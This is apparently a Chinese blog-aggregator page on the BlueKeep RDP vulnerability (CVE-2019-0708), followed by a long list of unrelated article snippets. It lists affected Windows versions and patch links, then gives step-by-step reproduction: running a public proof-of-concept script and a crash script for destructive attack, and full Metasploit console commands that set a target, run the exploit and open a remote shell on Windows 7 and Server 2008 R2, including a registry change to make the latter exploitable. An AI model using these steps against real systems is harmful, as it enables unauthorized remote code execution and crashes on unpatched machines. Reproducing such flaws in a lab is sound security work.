JJJoeee
JJJoeee

CVE-2019-0708远程桌面漏洞验证和利用

漏洞影响范围:

Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows XP SP3 x86
Windows XP Professional x64 Edition SP2
Windows XP Embedded SP3 x86
Windows Server 2003 SP2 x86
Windows Server 2003 x64 Edition SP2

微软补丁下载(不包括XP和2003):

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

Windows Server 2003 漏洞补丁系列下载地址

Windows Server 2003 32位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
Windows Server 2003 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

Windows XP 漏洞补丁系列下载地址

Windows XP 32位系统:
http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
Windows XP 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

国内漏洞编号(CNVD-2019-14264、CNNVD-201905-434)

使用python脚本复现

1.准备一台安装了python3的机器(win或linux都可以)

2.下载https://github.com/n1xbyte/CVE-2019-0708的相关文件
poc.py(验证漏洞是否存在)
crashpoc.sh(进行破坏性攻击)
python xx.py ipAddress 32or64(目标win是32位还是64位)

3.安装impacket、Structure扩展包
pip3 install impacket
pip3 install Structure

4.安装openssl

5.给以上两个python文件赋予权限并执行

使用metasploit复现

下载metasploit相关文件:
下载地址:https://github.com/rapid7/metasploit-framework
下载RDP依赖:metasploit-framework/lib/msf/core/exploit/rdp.rb
下载RDP扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
下载cve-0708扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
下载cve-0708利用模块:metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

攻击windows 7 SP1 复现CVE-2019-0708

msfconsole
msf5> reload_all
msf5> search cve_2019_0708_bluekeep_rce
msf5> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.7
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > shell
如果成功的话就会进入rhost的ms-dos,可以输入whoami、net user查看相关信息

攻击windows 2008 R2 SP1 复现CVE-2019-0708

需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0(系统默认为1)
在MSF下执行如下命令:
msf5 > search cve_2019_0708_bluekeep_rce
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.10
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

你可能感兴趣的:(CVE-2019-0708远程桌面漏洞验证和利用)

  • 精密校平机:工业制造的精度之源 玛哈特-小易 制造精密矫平机科技
    在现代工业制造的精密领域,精密校平机已成为确保材料平整度和产品精度的关键设备。它广泛应用于汽车制造、电子设备、航空航天、医疗设备等多个行业,为提高产品质量和生产效率发挥着不可或缺的作用。工作原理与技术优势精密校平机采用先进的多辊矫平技术,结合高精度的压力调节系统,能够自动适应不同材质、厚度的板材,确保每一次校平作业都精准无误。其工作原理是通过机械设备对材料施加一定的力,使材料在弹塑性弯曲条件下,通
  • 异步编程与流水线架构:从理论到高并发 长安er 学习心得高性能并行计算光电架构数学建模GUI全息异步多线程流水线
    目录一、异步编程核心机制解析1.1同步与异步的本质区别1.1.1控制流模型1.1.2资源利用对比1.2阻塞与非阻塞的技术实现1.2.1阻塞I/O模型1.2.2非阻塞I/O模型1.3异步编程关键技术1.3.1事件循环机制1.3.2Future/Promise模式1.3.3协程(Coroutine)1.4同步与异步的混合编程1.4.1同步转异步模式1.4.2异步转同步模式二、全息成像流水线中的异步实践
  • C++:类(通识版) 愚戏师 C++c++开发语言数据结构算法
    类的基本思想是数据抽象(dataabstraction)和封装(encapsulation)。数据抽象是一种依赖于接口(interface)和实现(implementation)分离的编程(以及设计)技术。类的接口包括用户所能执行的操作;类的实现则包括类的数据成员、负责接口实现的函数体以及定义类所需的各种私有函数。封装实现了类的接口和实现的分离。封装后的类隐藏了它的实现细节,也就是说,类的用户只能
  • pip设置国内源 pip设置国内镜像 程序员leon Linux系列pippython
    以下是配置pip国内镜像源的完整方法及注意事项,综合主流配置方案和常见问题解决方案:一、临时使用国内源(单次有效)安装时通过-i参数指定镜像源:pipinstall包名-ihttps://pypi.tuna.tsinghua.edu.cn/simple--trusted-hostpypi.tuna.tsinghua.edu.cn-推荐源地址*:清华大学:https://pypi.tuna.tsin
  • C++ XML文件和解析 RangoLei_Lzs C++前端服务器xmlc++
    XML(可扩展标记语言)是一种用于存储和传输数据的标记语言。它具有自描述性和平台无关性的特点。XML文档的格式主要由一组嵌套的元素和属性构成,结构清晰,易于理解和解析。XML文档的基本格式一个XML文档通常包括以下部分:XML声明:标识文档和版本信息。根元素:整个XML文档只能有一个根元素,所有其他元素必须嵌套在根元素内。元素:具有开始标签和结束标签,可以嵌套其他元素。属性:为元素提供额外的信息。
  • 基于腾讯云大模型知识引擎与DeepSeek的沉浸式历史文化体验系统实践 lijiek 腾讯云microsoft云计算
    前言文化遗产数字化保护与传播是当今科技与人文交汇的重要领域。传统的数字化方法往往局限于静态展示,无法实现真正的互动体验。本文将探索一条创新路径:利用腾讯云大模型知识引擎(LKE)与DeepSeek模型构建沉浸式历史文化体验系统,实现与历史人物的"对话"、历史场景的"复原",以及文化知识的智能传播。作为实践案例,我们以中国古代科技成就为切入点,打造了一个可交互的"古代科技馆",让用户能够与张衡、祖冲
  • 第十五章:模板参数推导_《C++ Templates》notes 郭涤生 c/c++c++windows开发语言
    模板参数推导第十五章核心知识点概览多选题设计题测试用例总结第十五章核心知识点概览模板参数推导基础引用折叠与完美转发SFINAE原则C++17类模板参数推导auto和decltype(auto)的推导规则模板参数推导基础知识点:函数模板参数通过调用时的实参类型推导数组/函数类型退化为指针引用类型不触发退化默认参数不参与推导代码示例:#include#includetemplatevoiddeduce
  • 如何使用LangChain流式处理工具事件 fgayif langchainjava前端python
    在AI开发中,实时处理和监听事件是一项关键能力,特别是在处理复杂的模型和工具链时。本文将向您展示如何使用LangChain框架流式处理自定义工具中的事件,以便更好地监控和调试模型的内部状态。技术背景介绍LangChain是一个用于构建和操作语言模型的工具库,其中astream_events()方法能帮助我们监听和处理来自模型的事件流。了解如何正确地配置这些事件对于调试和高级应用至关重要,尤其是在运
  • 【XML协议】轻松掌握使用C++ XML解析库——pugixml XYY_CN C++入坑xmlc++
    文章介绍了xml协议的组成以及C++xml解析库pugixml的常用操作。源于开发中每次遇到xml操作时,都要回过头查看pugixml库常用操作时什么样的,能不能有个更深刻和清晰的认识呢?其实搞清楚xml结构和pugixml组织结构的对照关系,以及pugixml中节点、属性的增删改查逻辑,可以帮助我们快速回忆起这些东西。遂,本文留作查询使用。XML协议XML(ExtensibleMarkupLan
  • 对 Ajax 技术的理解 向贤 技术面试前端开发ajax前端javascript
    文章目录一、技术原理与核心机制1.异步通信流程2.核心对象与API3.数据格式演进二、Ajax的核心优势三、应用场景与示例1.表单动态验证2.动态内容加载3.实时数据更新四、Ajax与传统同步请求对比五、安全性考量与解决方案1.安全威胁2.防御措施3.跨域解决方案六、现代演进与相关技术1.FetchAPI取代XHR2.异步编程优化3.单页应用(SPA)框架七、总结应用建议:Ajax(Asynchr
  • 2025年首个!又一家智驾供应链企业成功上市,踩准感知红利风口 高工智能汽车 人工智能汽车
    3月18日,弘景光电在深交所创业板正式挂牌上市,成为了2025年开年首家成功上市的智能汽车供应链企业。弘景光电作为一家专业从事光学镜头及摄像模组产品的研发、设计、生产和销售的高新技术企业,已深耕行业十多年,目前其产品应用领域主要包括智能汽车汽车及新兴消费两大领域,其中车载光学镜头产品主要应用于智能座舱和智能驾驶系统。在过去的几年中,弘景光电抓住车载光学镜头和新兴消费电子市场的巨大增长机会,业绩实现
  • 一年狂揽270亿新订单,德赛西威开启「狂飙」模式 高工智能汽车 人工智能
    德赛西威在汽车智能网联产业的龙头地位还在进一步稳固,这从其刚刚公布的2024年年报中可见一斑。2024年,德赛西威实现营业收入276.18亿元,同比增长26.06%,归属于上市公司股东的净利润20.05亿元,同比增长29.62%。综合来看,德赛西威的多项核心业务在2024年均显示了强劲的增长势头,尤其是智能座舱和智能驾驶业务凭借产品迭代升级,在客户新增与市场渗透率方面持续攀升,此外海外业务成长为新
  • 高速NOA要爆!一年「1000万辆」市场红利,谁是最大赢家? 高工智能汽车 人工智能大数据
    只有更低,没有最低。从7万元价位到5万元价位,2025的“智驾平权”之战开局已是火拼。有消息披露,奇瑞计划在小蚂蚁等入门级产品上全系标配基于高通8620平台的智能驾驶系统,可实现高速NOA和记忆泊车功能。2025款奇瑞小蚂蚁的起售价是5.99万元,按照这个价格区间,相当于高速NOA智驾方案进一步下探到5万级别水平。对比比亚迪将高速NOA智驾首次带入7万级车型市场,奇瑞这一动作无疑进一步加剧今年高阶
  • 使用Python和Django构建支持多语言的博客网站 程序员~小强 pythondjangosqlite
    随着互联网的发展,博客已经成为人们获取信息和分享想法的重要平台。但是不同国家和地区的用户语言各异,这给博客的国际化带来了挑战。本文将介绍如何使用Python和Django这两个强大的Web开发框架,来构建一个支持多语言的博客网站。Django框架概述Django是一个开源的Web应用框架,由Python写成。它鼓励快速开发和干净的设计。通过提供大量常用组件,Django可以更快地构建高质量的Web
  • 阿里云+华为云双活架构:头部企业的云端生存法则 云上的阿七 阿里云华为云架构
    如何在云端构建高可用、高可靠的业务架构,依然是企业IT决策者面临的挑战。面对单一云厂商可能带来的故障风险,越来越多的头部企业开始采用“阿里云+华为云”双活架构,以提升业务连续性,实现跨云容灾,打造更稳健的云端生存法则。什么是双活架构?双活架构(Active-ActiveArchitecture)指的是企业在两个云平台(如阿里云和华为云)上同时运行核心业务,实现数据同步和业务负载均衡。一旦某一云平台
  • 探寻制造型企业MES管理系统:功能、架构与应用全解析 深蓝易网 数字工厂制造架构人工智能1024程序员节大数据运维
    在当今制造业蓬勃发展的背景下,制造执行MES系统对于制造型企业的高效运营起着举足轻重的作用。MES管理系统作为连接企业上层管理与底层生产的关键桥梁,其功能模块设计、架构搭建、系统集成以及实际应用都对企业的生产效能和竞争力有着深远影响。一、MES管理系统功能模块设计MES系统具备一系列功能强大的模块,以满足企业复杂的生产管理需求。计划管理模块:此模块主要负责生产计划的编制、下达和灵活调度。它依据订单
  • 【Golang】defer与recover的组合使用 星星点点洲 Gogolang开发语言后端
    在Go语言中,defer和recover是两个关键特性,通常结合使用以处理资源管理和异常恢复。以下是它们的核心应用场景及使用示例:1.defer的应用场景defer用于延迟执行函数调用,确保在函数退出前执行特定操作。主要用途包括:资源释放文件操作:确保文件句柄关闭。funcreadFile(filenamestring)error{file,err:=os.Open(filename)iferr!
  • 【go】如何处理可选配置 还没入门的大菜狗 gogolang开发语言
    问题背景:在设计API时,如何处理可选配置?1.配置结构体好处:解决兼容性,但问题是0值,和可读性差如何解决0值?——使用指针,将nil和类型0值做区分但是入参包含结构体,可读性差无法解决2.生成器模式生成器模式介绍生成器模式(BuilderPattern)是一种创建型设计模式,用于构建复杂对象。该模式将对象的构造过程与其表示分离,使同样的构建过程可以创建不同的表示。从您提供的代码中,我们可以看到
  • 零基础上手Python数据分析 (7):Python 面向对象编程初步 kakaZhui python数据分析excel
    写在前面回顾一下,我们已经学习了Python的基本语法、数据类型、常用数据结构和文件操作、异常处理等。到目前为止,我们主要采用的是面向过程(ProceduralProgramming)的编程方式,即按照步骤一步一步地编写代码,解决问题。这种方式对于简单的任务已经足够,但当程序变得越来越复杂,代码量越来越大时,面向过程编程可能会显得力不从心,代码难以组织、复用和维护。代码复杂性带来的挑战:面向过程v
  • 使用AI识别语音和B站视频并通过GPT生成思维导图 思维导图gpt-4
    AI脑图除了对文本、网页链接和文件生成思维导图外,现在也支持了对语音和B站视频的内容识别,并自动生成思维导图。语音生成思维导图直接发送语音:对AI脑图公众号直接发送语音(如使用语音说厦门三天两夜的旅行攻略),AI脑图会自动识别语音内容然后根据内容要求生成思维导图上传语音文件:支持多种音频格式,上传完成后AI脑图会识别音频内容,然后提炼内容关键信息、结构化梳理,并生成思维导图,同时也可以下载识别好的
  • 使用AI识别语音和B站视频并通过GPT生成思维导图 思维导图gpt-4
    AI脑图除了对文本、网页链接和文件生成思维导图外,现在也支持了对语音和B站视频的内容识别,并自动生成思维导图。语音生成思维导图直接发送语音:对AI脑图公众号直接发送语音(如使用语音说厦门三天两夜的旅行攻略),AI脑图会自动识别语音内容然后根据内容要求生成思维导图上传语音文件:支持多种音频格式,上传完成后AI脑图会识别音频内容,然后提炼内容关键信息、结构化梳理,并生成思维导图,同时也可以下载识别好的
  • Nginx + CertBot 配置HTTPS泛域名证书(Rocky Linux 9.4)
    #安装nginx此步省略,以nginx安装在'/usr/local/nginx-1.23.3'目录为例#1.安装certbot#更新包列表sudodnfupdate#安装EPEL仓库:EPEL仓库提供了许多有用的软件包,包括certbotsudodnfinstall-yepel-release#安装Certbot和Nginx插件。dnfinstall-ycertbotpython3-certbot
  • OCR提取+识别方案 ocr
    1.内容提取通过YOLO提取需要识别的区域1.1安装ultralytics创建虚拟环境(可选)#创建虚拟环境python-mvenv.venv#激活虚拟环境###激活虚拟环境将更改shell的提示以显示您正在使用的虚拟环境,并修改环境,以便运行时python可以获得特定版本和安装的Python。例如:source.venv/bin/activate#显示虚拟环境中安装的所有软件包:python-m
  • Windows端口转发命令 windows
    命令介绍Windows从Windows2000开始就提供了最基本的端口转发功能,是基于Windows的IPHelper服务的,不仅可以提供端口转发功能,还可以通过将IPv4和IPv6的不同地址的数据进行转发,但是只可以转发TCP协议,暂不支持UDP协议,使用netshinterfaceportproxy命令即可开启。添加端口转发netshinterfaceportproxyaddv4tov4lis
  • 万字总结(含理解):git reset、revert、checkout --file、stash、rebase、merge 周里奥 gitgit学习
    结尾附基本常用命令gitcommit--amend改写提交gitreset回滚代码仓库gitcheckout--file放弃暂存区的修改gitreset测试过程gitrevert测试过程reset和revert区别gitstash测试过程merge对比rebase模拟冲突产生情况git常用命令gitcommit--amend改写提交重写上一次的提交信息,不会生成新的版本号执行了一次提交,提交信息是
  • oracle 时间格式化 to——datetime,精通 Oracle+Python,第 2 部分:处理时间和日期 照月鱼yoyi oracle时间格式化to——datetime
    作者:PrzemyslawPiotrowskiOracle和Python的日期处理介绍2007年9月发布从Python2.4版开始,cx_Oracle自身可以处理DATE和TIMESTAMP数据类型,将这些列的值映射到Python的datetime模块的datetime对象中。因为datetime对象支持原位的运算操作,这可以带来某些优势。内置的时区支持和若干专用模块使Python成为一台实时机器
  • 位宽512bit显卡_6144 CUDA/512bit位宽 Maxwell架构曝光 李涛PS 位宽512bit显卡
    【IT168资讯】NVIDIA目前一代的显卡有GK104和GK110两大分支,它们的侧重点不同,但都是基于Kepler(开普勒,天文学家)架构的,下一代架构名为Maxwell(麦克斯韦尔,物理学家),根据之前的传闻Maxwell最快将在明年Q1季度问世,制程有可能继续使用TSMC的28nm工艺。现在网上又流传开Maxwell的架构设计了,旗舰GM100将有6144个CUDA核心,512bit位宽显
  • 正则表达式 思考的橙子 后端正则表达式
    概念:正则表达式定义了字符串组成的规则定义:1.直接量:注意不要加引号varreg=/^lw{6,12}$/;创建RegExp对象varreg=newRegExp("^lw{6,12}$");方法:test(str):判断指定字符串是否符合规则,返回true或false语法:^:表示开始$:表示结束[]:代表某个范围内的单个字符,比如:[0-9]单个数字字符.:代表任意单个字符,除了换行和行结束符
  • SourceTree安装与使用 缘来的精彩 sourceTreegit
    一、简介:一个用于Windows和Mac的免费Git客户端。Sourcetree简化了如何与Git存储库进行交互,这样您就可以集中精力编写代码。通过Sourcetree的简单GitGUI可视化和管理存储库。官网下载地址:Sourcetree|FreeGitGUIforMacandWindowsSourceTree下载-SourceTree最新版下载V3.4.22-阔思亮本文介绍的版本为source
  • Spring Bean 的生命周期是怎样的? 冰糖心书房 SpringFramework2025Java面试系列javaspring
    SpringBean的生命周期是指从Bean的创建到销毁的整个过程,这个过程由SpringIoC容器管理。理解Bean的生命周期可以帮助我们在控制Bean的初始化和销毁行为,以及在Bean生命周期的不同阶段执行自定义逻辑。以下是SpringBean的完整生命周期,包括各个阶段以及可以介入的方法:1.实例化(Instantiation):Bean定义加载:Spring容器读取Bean定义(XML配置
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他